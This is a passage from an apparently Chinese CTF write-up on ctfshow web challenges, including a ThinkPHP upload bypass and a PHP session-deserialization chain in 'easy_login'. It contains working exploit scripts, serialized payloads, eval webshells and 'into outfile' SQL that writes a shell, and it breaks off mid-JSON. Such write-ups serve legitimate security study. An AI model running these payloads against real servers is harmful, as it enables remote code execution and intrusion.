\"\/uploads\/\"+scriptDate+\"\/\"+md5+\".php\"\n        print(\"\u6b63\u5728\u7206\u7834\"+url+route)\n        response = session.get(url=url+route,headers=headers)\n        if response.status_code == 200:\n            print(\"\u6210\u529fgetshell\uff0c\u5730\u5740\u4e3a \"+url+route)\n            exit()\n\n        h.write(route+\"\\n\")\n    h.close()\n    print(\"\u7206\u7834\u7ed3\u675f\")\n    return\n\ndef string_to_md5(string):\n    md5_val = hashlib.md5(string.encode('utf8')).hexdigest()\n    return md5_val\n\nif __name__ == \"__main__\":\n    init()\n    getPrefix()\n    checkUrl()<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u9898\u6700\u540e\u89e3\u8fd9\u4e48\u5c11\u4f30\u8ba1\u662f\u56e0\u4e3a\u9898\u76ee\u63cf\u8ff0\u592a\u7384\u4e4e\u4e86\uff0c\u8bf4\u4ec0\u4e48thinkphp\u5e95\u5c42\u6f0f\u6d1e\uff0cthinkphp\u786e\u5b9e\u6709\u5e95\u5c42\u6f0f\u6d1e\uff0c\u4f46\u4e0d\u662f\u8fd9\u4e2a\uff0c\u8fd9\u4e2a\u5176\u5b9e\u5c31\u662f\u4f7f\u7528\u4e86tp\u9ed8\u8ba4\u7684\u4e0a\u4f20\u65b9\u6cd5\uff0c\u5e95\u5c42\u6f0f\u6d1e\u662ftp\u9ed8\u8ba4\u7684img\u4e0a\u4f20\u65b9\u6cd5\u5bf9\u540e\u7f00\u6ca1\u6709\u8fc7\u6ee4\uff1ahttps:\/\/github.com\/top-think\/framework\/issues\/2772\uff0c\u4e5f\u5c31\u662f\u8bf4\u7c7b\u4f3c\u4e8erequest()->file(‘image’)\u7684\u8bed\u53e5\u5176\u5b9e\u8fd8\u662f\u53ef\u4ee5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\uff0c\u4e3b\u8981\u903b\u8f91\u9519\u8bef\u5728move\u8fd9\u91cc\uff1a<\/p>\n\n\n\n
public function move($path, $savename = true, $replace = true)\n    {\n        \/\/ \u6587\u4ef6\u4e0a\u4f20\u5931\u8d25\uff0c\u6355\u83b7\u9519\u8bef\u4ee3\u7801\n        if (!empty($this->info['error'])) {\n            $this->error($this->info['error']);\n            return false;\n        }\n\n        \/\/ \u68c0\u6d4b\u5408\u6cd5\u6027\n        if (!$this->isValid()) {\n            $this->error = 'upload illegal files';\n            return false;\n        }\n\n        \/\/ \u9a8c\u8bc1\u4e0a\u4f20\n        if (!$this->check()) {\n            return false;\n        }\n\n        $path = rtrim($path, DS) . DS;\n        \/\/ \u6587\u4ef6\u4fdd\u5b58\u547d\u540d\u89c4\u5219\n        $saveName = $this->buildSaveName($savename);\n        $filename = $path . $saveName;\n\n        \/\/ \u68c0\u6d4b\u76ee\u5f55\n        if (false === $this->checkPath(dirname($filename))) {\n            return false;\n        }\n\n        \/\/ \u4e0d\u8986\u76d6\u540c\u540d\u6587\u4ef6\n        if (!$replace && is_file($filename)) {\n            $this->error = ['has the same filename: {:filename}', ['filename' => $filename]];\n            return false;\n        }\n\n        \/* \u79fb\u52a8\u6587\u4ef6 *\/\n        if ($this->isTest) {\n            rename($this->filename, $filename);\n        } elseif (!move_uploaded_file($this->filename, $filename)) {\n            $this->error = 'upload write error';\n            return false;\n        }\n\n        \/\/ \u8fd4\u56de File \u5bf9\u8c61\u5b9e\u4f8b\n        $file = new self($filename);\n        $file->setSaveName($saveName)->setUploadInfo($this->info);\n\n        return $file;\n    }<\/code><\/pre>\n\n\n\n
\u7136\u540e\u8fdb\u884ccheck\uff0c\u6ce8\u610f\u524d\u9762\u76f4\u63a5\u8c03\u7528\u4e86$this->check()\uff0c\u4e5f\u5c31\u662f\u6ca1\u6709\u4f20\u53c2$rule\u662f\u7a7a\u7684\uff0c\u6709\u7528\u7684\u68c0\u9a8c\u5176\u5b9e\u53ea\u6709checkImg():<\/p>\n\n\n\n
public function check($rule = [])\n    {\n        $rule = $rule ?: $this->validate;\n\n        \/* \u68c0\u67e5\u6587\u4ef6\u5927\u5c0f *\/\n        if (isset($rule['size']) && !$this->checkSize($rule['size'])) {\n            $this->error = 'filesize not match';\n            return false;\n        }\n\n        \/* \u68c0\u67e5\u6587\u4ef6 Mime \u7c7b\u578b *\/\n        if (isset($rule['type']) && !$this->checkMime($rule['type'])) {\n            $this->error = 'mimetype to upload is not allowed';\n            return false;\n        }\n\n        \/* \u68c0\u67e5\u6587\u4ef6\u540e\u7f00 *\/\n        if (isset($rule['ext']) && !$this->checkExt($rule['ext'])) {\n            $this->error = 'extensions to upload is not allowed';\n            return false;\n        }\n\n        \/* \u68c0\u67e5\u56fe\u50cf\u6587\u4ef6 *\/\n        if (!$this->checkImg()) {\n            $this->error = 'illegal image files';\n            return false;\n        }\n\n        return true;\n    }<\/code><\/pre>\n\n\n\n
\u6700\u540echeckImg\uff1a<\/p>\n\n\n\n
public function checkImg()\n    {\n        $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION));\n\n        \/\/ \u5982\u679c\u4e0a\u4f20\u7684\u4e0d\u662f\u56fe\u7247\uff0c\u6216\u8005\u662f\u56fe\u7247\u800c\u4e14\u540e\u7f00\u786e\u5b9e\u7b26\u5408\u56fe\u7247\u7c7b\u578b\u5219\u8fd4\u56de true\n        return !in_array($extension, ['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']) || in_array($this->getImageType($this->filename), [1, 2, 3, 4, 6, 13]);\n    }<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u770b\u51fa\u6765\u8fd9\u91cc\u903b\u8f91\u975e\u5e38\u5947\u8469\uff0ccheck\u51fd\u6570\u5185\u5bf9checkImg\u7684\u8c03\u7528\u662f<\/p>\n\n\n\n
 if (!$this->checkImg()) {\n            $this->error = 'illegal image files';\n            return false;\n        }<\/code><\/pre>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u60f3\u8981\u5408\u6cd5\u5f97$this->checkImg()\u4e3atrue\uff0ccheckImg()\u7684\u903b\u8f91\u5b98\u65b9\u6ce8\u91ca\u5df2\u7ecf\u8bf4\u4e86\uff1a\u5982\u679c\u4e0a\u4f20\u7684\u4e0d\u662f\u56fe\u7247\uff0c\u6216\u8005\u662f\u56fe\u7247\u800c\u4e14\u540e\u7f00\u786e\u5b9e\u7b26\u5408\u56fe\u7247\u7c7b\u578b\u5219\u8fd4\u56de true<\/em>\uff0c\u4e5f\u5c31\u662f\u8bf4\u5982\u679c\u6211\u4eec\u4e0a\u4f20\u4e2a1.php\uff0c\u56e0\u4e3a\u540e\u7f00\u4e0d\u662f\u56fe\u7247\u6240\u4ee5\u76f4\u63a5\u5224\u65ad\u5408\u6cd5\u4e86\uff0c\u56e0\u6b64request()->file(‘image’)\u8fd9\u6837\u7684\u8bed\u53e5\u662f\u53ef\u4ee5\u76f4\u63a5\u4e0a\u4f20php\u6587\u4ef6\u7684\uff0c\u6700\u540e\u4fdd\u5b58\u7684\u8def\u5f84\u662fuploads .DS . date(‘Ymd’) . DS . md5(microtime(true)) . ‘.’ . pathinfo($this->getInfo(‘name’), PATHINFO_EXTENSION)\uff0c\u6bd4\u5982\u5f53\u524d\u65f6\u95f4\u662f2024-01-21\u76841705846016.4209\uff0c\u6700\u540e\u4fdd\u5b58\u7684\u6587\u4ef6\u5c31\u662furl\/uploads\/20240121\/6945de42b5e164a2fba3ec472be16cdd.php\uff0c\u6ce8\u610f\u6700\u540e\u7684\u65f6\u95f4\u6233\u662f\u53bb0\u7684\uff0c\u6bd4\u59821705846016.4\uff0cmd5(1705846016.4)\u548cmd5(1705846016.4000)\u7684\u503c\u662f\u4e0d\u4e00\u6837\u7684<\/p>\n\n\n\n
easy_login<\/h2>\n\n\n\n
\u9884\u671f\u89e3<\/h3>\n\n\n\n
\u5173\u952egetshell\u903b\u8f91\u5728common.php\uff1a<\/p>\n\n\n\n
class userLogger{\n\n    public $username;\n    private $password;\n    private $filename;\n\n    public function __construct(){\n        $this->filename = \"log.txt_$this->username-$this->password\";\n        $data = \"\u6700\u540e\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\" \u7528\u6237\u540d $this->username \u5bc6\u7801 $this->password \\n\";\n        $d = file_put_contents($this->filename,$data,FILE_APPEND);\n    }\n    public function setLogFileName($filename){\n        $this->filename = $filename;\n    }\n\n    public function __wakeup(){\n        $this->filename = \"log.txt\";\n    }\n    public function user_register($username,$password){\n        $this->username = $username;\n        $this->password = $password;\n        $data = \"\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\"\u7528\u6237\u6ce8\u518c\uff1a \u7528\u6237\u540d $username \u5bc6\u7801 $password\\n\";\n        file_put_contents($this->filename,$data,FILE_APPEND);\n    }\n\n    public function user_login($username,$password){\n        $this->username = $username;\n        $this->password = $password;\n        $data = \"\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\"\u7528\u6237\u767b\u9646\uff1a \u7528\u6237\u540d $username \u5bc6\u7801 $password\\n\";\n        file_put_contents($this->filename,$data,FILE_APPEND);\n    }\n\n    public function user_logout(){\n        $data = \"\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\"\u7528\u6237\u9000\u51fa\uff1a \u7528\u6237\u540d $this->username\\n\";\n        file_put_contents($this->filename,$data,FILE_APPEND);\n    }\n}<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e\u70b9\u5c31\u5728\u4e8e\u8fd9\u4e2afile_put_contents($this->filename,$data,FILE_APPEND)\uff0c\u5982\u679c\u6211\u4eec\u53ef\u4ee5\u63a7\u5236$this->filename\u548c$data\uff0c\u5411\u4e00\u4e2aphp\u6587\u4ef6\u5199\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c\u5c31\u53ef\u4ee5getshell\u4e86\uff0c\u6211\u4eec\u770b\u5230userLogger::__construct:<\/p>\n\n\n\n
  public function __construct(){\n        $this->filename = \"log.txt_$this->username-$this->password\";\n        $data = \"\u6700\u540e\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\" \u7528\u6237\u540d $this->username \u5bc6\u7801 $this->password \\n\";\n        $d = file_put_contents($this->filename,$data,FILE_APPEND);\n    }<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u6587\u4ef6\u540d\u88ab\u4fdd\u5b58\u4e3alog.txt_$this->username-$this->password\uff0c$this->password\u662f\u6211\u4eec\u53ef\u63a7\u7684\uff0c\u5982\u679c\u6211\u4eec\u8d4b\u503c\u4e3a\u4e3a<?php eval($_POST[1]);?>.php\uff0c\u90a3\u4e48\u6211\u4eec\u5c31\u662f\u5411log.txt_$this->username-<?php eval($_POST[1]);?>.php<\/code>\u8fd9\u4e2aphp\u6587\u4ef6\u5199\u5165\u6700\u540e\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\" \u7528\u6237\u540d $this->username <?php=eval($_POST[1]);?>.php \\n<\/code>\uff0c\u5f88\u660e\u663e\u76f4\u63a5getshell\u4e86<\/p>\n\n\n\n
\u4f46\u8fd9\u91cc\u6211\u4eec\u6ca1\u6709unserialize\u51fd\u6570\uff0c\u53ea\u80fd\u8003\u8651session\u53cd\u5e8f\u5217\u5316:<\/p>\n\n\n\n
public function getLoginName($name){\n        $data = $this->cookie->getCookie($name);\n        if($data === NULL && isset($_GET['token'])){\n            session_decode($_GET['token']);\n            $data = $_SESSION['user'];\n        }\n        return $data;\n    }<\/code><\/pre>\n\n\n\n
session_decode($_GET[‘token’])\u5411session\u5b58\u5bf9\u8c61\uff0c$_SESSION[‘user’]\u53d6\u5bf9\u8c61\uff0c\u8fd9\u91cc\u9700\u8981\u6784\u9020token=user|\u5e8f\u5217\u5316\u5b57\u7b26\u4e32<\/code>,\u5bf9getLoginName\u7684\u8c03\u7528\u5728main.php\uff1a<\/p>\n\n\n\n
<?php\n\n$name =  $app->getLoginName('user');\n\nif($name){\n    echo \"\u606d\u559c\u4f60\u767b\u9646\u6210\u529f <a href='\/index.php?action=logout'>\u9000\u51fa\u767b\u9646<\/a>\";\n}else{\n    include 'login.html';\n}<\/code><\/pre>\n\n\n\n
\u60f3\u8c03\u7528main.php\u53c8\u5f97\u770b\u5230index.php\uff1a<\/p>\n\n\n\n
<?php\n\nerror_reporting(0);\nsession_start();\nrequire_once 'common.php';\n\n$action = $_GET['action'];\n$app = new application();\n\nif(isset($action)){\n\n    switch ($action) {\n        case 'do_login':\n            $ret = $app->login($_POST['username'],$_POST['password']);\n            if($ret){\n                $app->cookie->setcookie(\"user\",$_POST['username']);\n                $app->dispatcher->redirect('main');\n            }else{\n                echo \"\u767b\u5f55\u5931\u8d25\";\n            }\n            break;\n        case 'logout':\n            $app->logout();\n            $app->dispatcher->redirect('main');\n            break;    \n        case 'do_register':\n            $ret = $app->register($_POST['username'],$_POST['password']);\n            if($ret){\n                $app->dispatcher->sendMessage(\"\u6ce8\u518c\u6210\u529f\uff0c\u8bf7\u767b\u9646\");\n            }else{\n                echo \"\u6ce8\u518c\u5931\u8d25\";\n            }\n            break;\n        default:\n            include '.\/templates\/main.php';\n            break;\n    }\n}else{\n    $app->dispatcher->redirect('main');\n}<\/code><\/pre>\n\n\n\n
\u6700\u524d\u9762session_start()\u542f\u52a8\u4e86session\uff0c\u8bc1\u660e\u786e\u5b9e\u662fsession\u53cd\u5e8f\u5217\u5316\u3002\u4e09\u4e2aswitch\u9009\u9879\u8fd9\u91cc\u53ea\u8981\u524d\u4e09\u4e2a\u90fd\u4e0d\u6ee1\u8db3\u5c31\u662f\u6700\u540e\u7684default\u4f1a\u5305\u542bmain.php\uff0c\u73b0\u5728\u903b\u8f91\u6e05\u695a\u4e86\uff0caction\u5206\u652f\u8fdb\u5165default\u5305\u542bmain.php\uff0c\u7136\u540emain.php\u89e6\u53d1$app->getLoginName(‘user’)\uff0c\u5728\u8fd9\u91cc\u8fdb\u884csession\u53cd\u5e8f\u5217\u5316\uff0c\u56de\u770b\u8fd9\u91cc\uff1a<\/p>\n\n\n\n
public function getLoginName($name){\n        $data = $this->cookie->getCookie($name);\n        if($data === NULL && isset($_GET['token'])){\n            session_decode($_GET['token']);\n            $data = $_SESSION['user'];\n        }\n        return $data;\n    }<\/code><\/pre>\n\n\n\n
$data === NULL && isset($_GET[‘token’])\u7684\u60c5\u51b5\u4e0b\u8fdb\u5165\u5206\u652f\uff0c$_GET[‘token’]\u662f\u6211\u4eec\u76f4\u63a5\u4f20\u7684\uff0c\u800c$data\u6765\u81ea\u4e8e$this->cookie->getCookie($name)\uff1a<\/p>\n\n\n\n
class cookie_helper{\n    private $secret = \"*************\"; \/\/\u654f\u611f\u4fe1\u606f\u6253\u7801\n\n    public  function getCookie($name){\n        return $this->verify($_COOKIE[$name]);\n\n    }\n\n    public function setCookie($name,$value){\n        $data = $value.\"|\".md5($this->secret.$value);\n        setcookie($name,$data);\n    }\n\n    private function verify($cookie){\n        $data = explode('|',$cookie);\n        if (count($data) != 2) {\n            return null;\n        }\n        return md5($this->secret.$data[0])=== $data[1]?$data[0]:null;\n    }\n}<\/code><\/pre>\n\n\n\n
\u60f3\u8981\u63a7\u5236$data\u4e3anull\u770b\u5230private function verify($cookie)\uff0c\u53ea\u8981count($data) != 2\u5373\u53ef\uff0c\u9996\u5148$data = explode(‘|’,$cookie)\uff0c\u4e5f\u5c31\u662f$data\u7684\u503c\u662f$cookie\u88ab|\u5206\u5272\u7684\u5b57\u7b26\u4e32\u6570\uff0c\u518d\u770bcookie\uff1a$data = $value.”|”.md5($this->secret.$value)\uff0c\u4e5f\u5c31\u662f\u4e4b\u524d\u5df2\u7ecf\u6709\u4e00\u4e2a|\u4e86\uff0c\u6211\u4eec\u7ed9\u7528\u6237\u540d\u91cc\u518d\u591a\u4e00\u4e2a|\u6bd4\u5982fushu|ling\u6700\u540e\u4fe9|\u5c31\u53ef\u4ee5\u628a\u5b57\u7b26\u4e32\u5206\u5272\u6210\u4e09\u4e2a\u8fd4\u56denull\u4e86\uff0c\u5f53\u7136\u4e8b\u5b9e\u4e0a\u4e0d\u7528\u6784\u9020\u8fd9\u79cd\u7528\u6237\u540d\u4e5f\u53ef\u4ee5\u5b9e\u73b0\uff0c\u56e0\u4e3areturn md5($this->secret.$data[0])=== $data[1]?$data[0]:null\u8fd9\u91cc\uff0c\u53ea\u8981secret.$data[0])!= $data[1]\u4e5f\u53ef\u4ee5\u8fd4\u56denull\uff0c\u6bd4\u5982\u7528\u6237\u540duserLogger\u4f1a\u751f\u6210cookie\uff1auser=userLogger|3628df06e1b4c52d9d2e0dfd251ba983\uff0csecret.$data[0]=userLogger\uff0csecret.$data[1]=3628df06e1b4c52d9d2e0dfd251ba983\uff0c\u4e24\u8005\u663e\u7136\u662f\u4e0d\u76f8\u7b49\u7684\uff0c\u6240\u4ee5\u8fd9\u91cc\u5176\u5b9e\u662f\u7edd\u5bf9\u6210\u7acb\u7684\u3002<\/p>\n\n\n\n
\u63a5\u4e0b\u6765\u5176\u5b9e\u662f\u6700\u5173\u952e\u7684\u4e00\u90e8\u5206\uff0c\u770b\u5230mysql_helper\uff1a<\/p>\n\n\n\n
class mysql_helper{\n    private $db;\n    public $option = array(\n        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION\n    );\n\n    public function __construct(){\n        $this->init();\n    }\n\n    public function __wakeup(){\n        $this->init();\n    }\n\n\n    private function init(){\n        $this->db = array(\n            'dsn' => 'mysql:host=127.0.0.1;dbname=blog;port=3306;charset=utf8',\n            'host' => '127.0.0.1',\n            'port' => '3306',\n            'dbname' => '****', \/\/\u654f\u611f\u4fe1\u606f\u6253\u7801\n            'username' => '****',\/\/\u654f\u611f\u4fe1\u606f\u6253\u7801\n            'password' => '****',\/\/\u654f\u611f\u4fe1\u606f\u6253\u7801\n            'charset' => 'utf8',\n        );\n    }\n\n    public function get_pdo(){\n        try{\n            $pdo = new PDO($this->db['dsn'], $this->db['username'], $this->db['password'], $this->option);\n        }catch(PDOException $e){\n            die('\u6570\u636e\u5e93\u8fde\u63a5\u5931\u8d25:' . $e->getMessage());\n        }\n    \n        return $pdo;\n    }\n\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u6709\u4e2a\u6211\u4eec\u53ef\u63a7\u7684$option\uff0c\u5176\u5b9e\u662f\u53ef\u4ee5\u6307\u5b9apdo\u7684\u94fe\u63a5\u8fc7\u7a0b\uff0c\u5982\u679c\u6211\u4eec\u5c06ATTR_DEFAULT_FETCH_MODE\u6307\u5b9a\u4e3a262152<\/code>\uff0c\u5c31\u53ef\u4ee5\u5c06\u7ed3\u679c\u7684\u7b2c\u4e00\u5217\u505a\u4e3a\u7c7b\u540d\uff0c \u7136\u540e\u65b0\u5efa\u4e00\u4e2a\u5b9e\u4f8b\uff0c\u5728\u521d\u59cb\u5316\u5c5e\u6027\u503c\u65f6\uff0csql\u7684\u5217\u540d\u5c31\u5bf9\u5e94\u8005\u7c7b\u7684\u5c5e\u6027\u540d\uff0c\u5982\u679c\u5b58\u5728\u67d0\u4e2a\u5217\u540d\uff0c\u4f46\u5728\u8be5\u7c7b\u4e2d\u4e0d\u5b58\u5728\u8fd9\u4e2a\u5c5e\u6027\u540d\uff0c\u5728\u8d4b\u503c\u65f6\u5c31\u4f1a\u89e6\u53d1\u7c7b\u7684_set\u65b9\u6cd5\u3002\u5c5e\u6027\u521d\u59cb\u5316\u7ed3\u675f\u540e\uff0c\u6700\u540e\u8fd8\u4f1a\u8c03\u7528\u4e00\u6b21 __construct\u65b9\u6cd5\uff0c\u8fd9\u4e5f\u662f\u4e3a\u4ec0\u4e48\u5b98\u65b9\u89e3\u91cc\u6ce8\u518c\u7684\u7528\u6237\u540d\u5fc5\u987b\u662fuserLogger\uff0c\u56e0\u4e3a\u8fd9\u91cc\u5176\u5b9e\u662f\u65b0\u5efa\u4e86\u4e00\u4e2auserLogger\u7c7b\uff0c\u7136\u540e\u8c03\u7528\u5176\u4e2d\u7684__construct()\uff0c\u4e5f\u5c31\u662f\u6700\u5f00\u59cb\u63d0\u5230\u7684\u80fdRCE\u7684\u90e8\u5206\uff1a<\/p>\n\n\n\n
 public function __construct(){\n        $this->filename = \"log.txt_$this->username-$this->password\";\n        $data = \"\u6700\u540e\u64cd\u4f5c\u65f6\u95f4\uff1a\".date(\"Y-m-d H:i:s\").\" \u7528\u6237\u540d $this->username \u5bc6\u7801 $this->password \\n\";\n        $d = file_put_contents($this->filename,$data,FILE_APPEND);\n    }<\/code><\/pre>\n\n\n\n
\u8981\u6253\u7684\u8bdd\u5206\u4e3a\u4e24\u6b65\uff0c\u9996\u5148\u6ce8\u518c\u4e00\u4e2a\u7528\u6237\u4e3auserLogger<\/code>\uff0c\u5bc6\u7801\u4e3a<?=eval($_POST[1]);?>.php<\/code>\uff0c\u5373\uff1a<\/p>\n\n\n\n
data={\n        \"username\":\"userLogger\",\n        \"password\":\"<?=eval($_POST[1]);?>.php\"\n    }\nresponse = requests.post(url=url+\"index.php?action=do_register\",data=data)<\/code><\/pre>\n\n\n\n
\u7136\u540e\u8fdb\u884csession\u53cd\u5e8f\u5217\u5316\uff0c\u89e6\u53d1userLogger::__construct()<\/p>\n\n\n\n
<?php\nclass cookie_helper{\n    private $secret;\n}\n\nclass mysql_helper{\n    private $db;\n    public $option = array(\n        PDO::ATTR_DEFAULT_FETCH_MODE => 262152\n    );\n\n    public function __construct(){\n        $this->init();\n    }\n\n    private function init(){\n        $this->db = array(\n        );\n    }\n}\n\nclass application{\n    public $cookie;\n    public $mysql;\n    public $dispather;\n    public $loger;\n    public $debug=true;\n\n    public function __construct(){\n        $this->cookie = new cookie_helper();\n        $this->mysql = new mysql_helper();\n        $this->dispatcher = new dispatcher();\n        $this->loger = new userLogger();\n        $this->loger->setLogFileName(\"..\/log.txt\");\n    }\n}\n\nclass userLogger{\n\n    public $username;\n    private $password;\n    private $filename;\n\n    public function setLogFileName($filename){\n        $this->filename = $filename;\n    }\n\n}\n\nclass dispatcher{\n}\n\n$a=new application();\n$b=new mysql_helper();\n$a->mysql=$b;\necho urlencode(serialize($a));\n#O%3A11%3A%22application%22%3A6%3A%7Bs%3A6%3A%22cookie%22%3BO%3A13%3A%22cookie_helper%22%3A1%3A%7Bs%3A21%3A%22%00cookie_helper%00secret%22%3BN%3B%7Ds%3A5%3A%22mysql%22%3BO%3A12%3A%22mysql_helper%22%3A2%3A%7Bs%3A16%3A%22%00mysql_helper%00db%22%3Ba%3A0%3A%7B%7Ds%3A6%3A%22option%22%3Ba%3A1%3A%7Bi%3A19%3Bi%3A262152%3B%7D%7Ds%3A9%3A%22dispather%22%3BN%3Bs%3A5%3A%22loger%22%3BO%3A10%3A%22userLogger%22%3A3%3A%7Bs%3A8%3A%22username%22%3BN%3Bs%3A20%3A%22%00userLogger%00password%22%3BN%3Bs%3A20%3A%22%00userLogger%00filename%22%3Bs%3A10%3A%22..%2Flog.txt%22%3B%7Ds%3A5%3A%22debug%22%3Bb%3A1%3Bs%3A10%3A%22dispatcher%22%3BO%3A10%3A%22dispatcher%22%3A0%3A%7B%7D%7D<\/code><\/pre>\n\n\n\n
\u811a\u672c\uff1a<\/p>\n\n\n\n
import requests\nimport time\n\nurl = \"http:\/\/38578ee2-680e-4236-b362-28fc9eb32421.challenge.ctf.show\/\"\n\ndef step1():\n    data={\n        \"username\":\"userLogger\",\n        \"password\":\"<?=eval($_POST[1]);?>.php\"\n    }\n    response = requests.post(url=url+\"index.php?action=do_register\",data=data)\n    time.sleep(1)\n    if \"script\" in response.text:\n        print(\"\u7b2c\u4e00\u6b65\u6267\u884c\u5b8c\u6bd5\")\n    else:\n        print(response.text)\n        exit()\n\ndef step2():\n    data=\"token=user|O%3A11%3A%22application%22%3A6%3A%7Bs%3A6%3A%22cookie%22%3BO%3A13%3A%22cookie_helper%22%3A1%3A%7Bs%3A21%3A%22%00cookie_helper%00secret%22%3BN%3B%7Ds%3A5%3A%22mysql%22%3BO%3A12%3A%22mysql_helper%22%3A2%3A%7Bs%3A16%3A%22%00mysql_helper%00db%22%3Ba%3A0%3A%7B%7Ds%3A6%3A%22option%22%3Ba%3A1%3A%7Bi%3A19%3Bi%3A262152%3B%7D%7Ds%3A9%3A%22dispather%22%3BN%3Bs%3A5%3A%22loger%22%3BO%3A10%3A%22userLogger%22%3A3%3A%7Bs%3A8%3A%22username%22%3BN%3Bs%3A20%3A%22%00userLogger%00password%22%3BN%3Bs%3A20%3A%22%00userLogger%00filename%22%3Bs%3A10%3A%22..%2Flog.txt%22%3B%7Ds%3A5%3A%22debug%22%3Bb%3A1%3Bs%3A10%3A%22dispatcher%22%3BO%3A10%3A%22dispatcher%22%3A0%3A%7B%7D%7D\"\n    response = requests.get(url=url+\"index.php?action=main&token=\"+data)\n    time.sleep(1)\n    print(\"\u7b2c\u4e8c\u6b65\u6267\u884c\u5b8c\u6bd5\")\n\ndef step3():\n    data={\n        \"1\":\"system('whoami && cat \/f*');\",\n    }\n    response = requests.post(url=url+\"log.txt_-%3C%3F%3Deval(%24_POST%5B1%5D)%3B%3F%3E.php\",data=data)\n    time.sleep(1)\n    if \"www-data\" in response.text:\n        print(\"\u7b2c\u4e09\u6b65 getshell \u6210\u529f\")\n        print(response.text)\n    else:\n        print(\"\u7b2c\u4e09\u6b65 getshell \u5931\u8d25\")\n\nif __name__ == '__main__':\n    step1()\n    step2()\n    step3()<\/code><\/pre>\n\n\n\n
\u5b98\u65b9\u811a\u672c\u90a3\u4e2a\u53cd\u5e8f\u5217\u5316\u6570\u636e\u6bd4\u8f83\u626f\u6de1\uff0c\u88ab\u6253\u7801\u7684\u9690\u85cf\u6570\u636e\u90fd\u62ff\u6765\u53cd\u5e8f\u5217\u5316\u4e86\uff0c\u5176\u5b9e\u90a3\u4e9b\u662f\u4e0d\u5fc5\u8981\u7684\u3002<\/p>\n\n\n\n
\u975e\u9884\u671f<\/h3>\n\n\n\n
ctfshow\u5143\u65e6\u6c34\u53cb\u8d5bweb easy_login\u8be6\u89e3<\/a>\uff0c\u770b\u7684\u8fd9\u4e2a\u5927\u4f6c\u7684\u3002<\/p>\n\n\n\n
\u8fd8\u662fmysql_helper\u8fd9\u91cc\uff0c\u5b98\u65b9\u6587\u6863<\/a>\u91cc\u8fd8\u6709\u4e00\u4e2a\u53c2\u6570MYSQL_ATTR_INIT_COMMAND<\/code>\uff0c\u53ef\u4ee5\u6307\u5b9a\u8fde\u63a5mysql\u65f6\u6267\u884c\u7684\u8bed\u53e5\uff0c\u6bd4\u5982\u76f4\u63a5\u5199\u4e2a\u9a6c\u5c31\u65e0\u654c\u4e86<\/p>\n\n\n\n
<?php\n\nsession_start();\nclass mysql_helper\n{\n    public $option = array(\n        PDO::MYSQL_ATTR_INIT_COMMAND => \"select '<?=eval(\\$_POST[1]);?>'  into outfile '\/var\/www\/html\/fushuling.php';\"\n    );\n}\nclass application\n{\n    public $mysql;\n    public $debug = true;\n\n    public function __construct()\n    {\n        $this->mysql = new mysql_helper();\n    }\n\n}\n$_SESSION['user'] = new application();\necho urlencode(session_encode());\n\n#user%7CO%3A11%3A%22application%22%3A2%3A%7Bs%3A5%3A%22mysql%22%3BO%3A12%3A%22mysql_helper%22%3A1%3A%7Bs%3A6%3A%22option%22%3Ba%3A1%3A%7Bi%3A1002%3Bs%3A57%3A%22select+%27%3C%3F%3D%60nl+%2F%2A%60%3B%27++into+outfile+%27%2Fvar%2Fwww%2Fhtml%2F3.php%27%3B%22%3B%7D%7Ds%3A5%3A%22debug%22%3Bb%3A1%3B%7D<\/code><\/pre>\n\n\n\n
\u811a\u672c\uff1a<\/p>\n\n\n\n
import requests\nimport time\n\nurl = \"http:\/\/38578ee2-680e-4236-b362-28fc9eb32421.challenge.ctf.show\/\"\n\ndef step1():\n    data=\"token=user%7CO%3A11%3A%22application%22%3A2%3A%7Bs%3A5%3A%22mysql%22%3BO%3A12%3A%22mysql_helper%22%3A1%3A%7Bs%3A6%3A%22option%22%3Ba%3A1%3A%7Bi%3A1002%3Bs%3A75%3A%22select+%27%3C%3F%3Deval%28%24_POST%5B1%5D%29%3B%3F%3E%27++into+outfile+%27%2Fvar%2Fwww%2Fhtml%2Ffushuling.php%27%3B%22%3B%7D%7Ds%3A5%3A%22debug%22%3Bb%3A1%3B%7D\"\n    response = requests.get(url=url+\"index.php?action=main&token=\"+data)\n    time.sleep(1)\n    print(\"\u7b2c\u4e00\u6b65\u6267\u884c\u5b8c\u6bd5\")\n\ndef step2():\n    data={\n        \"1\":\"system('whoami && cat \/f*');\",\n    }\n    response = requests.post(url=url+\"fushuling.php\",data=data)\n    time.sleep(1)\n    if \"www-data\" in response.text:\n        print(\"getshell \u6210\u529f\")\n        print(response.text)\n    else:\n        print(\"getshell \u5931\u8d25\")\n\nif __name__ == '__main__':\n    step1()\n    step2()<\/code><\/pre>\n\n\n\n
easy_api<\/h2>\n\n\n\n
\u8bbf\u95eeurl\/openapi.json\u83b7\u5f97api\u63a5\u53e3\u5217\u8868<\/p>\n\n\n\n
{\n  \"openapi\": \"3.1.0\",\n  \"info\": {\n    \"title\": \"FastAPI\",\n    \"version\": \"0.1.0\"\n  },\n  \"paths\": {\n    \"\/upload\/\": {\n      \"post\": {\n        \"summary\": \"Upload File\",\n        \"operationId\": \"upload_file_upload__post\",\n        \"requestBody\": {\n          \"content\": {\n            \"multipart\/form-data\": {\n              \"schema\": {\n                \"$ref\": \"#\/components\/schemas\/Body_upload_file_upload__post\"\n              }\n            }\n          },\n          \"required\": true\n        },\n        \"responses\": {\n          \"200\": {\n            \"description\": \"Successful Response\",\n            \"content\": {\n              \"application\/json\": {\n                \"schema\": {}\n              }\n            }\n          },\n          